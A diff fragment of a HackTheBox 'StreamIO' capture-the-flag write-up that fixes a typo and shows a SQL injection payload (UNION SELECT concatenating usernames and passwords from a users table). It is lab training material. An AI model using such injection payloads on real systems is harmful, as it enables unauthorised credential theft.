LoganCallery/Writeups/HTB/CPTS/StreamIO/StreamIO.md

 ![Users Columns](image-17.png)

 Okay great!
-Now lets see if we can see the `username` and `password` columns using the query:
+Now let's see if we can see the `username` and `password` columns using the query:

 ```
 1408' UNION select 1,CONCAT(username, ':', password),3,4,5,6 FROM users--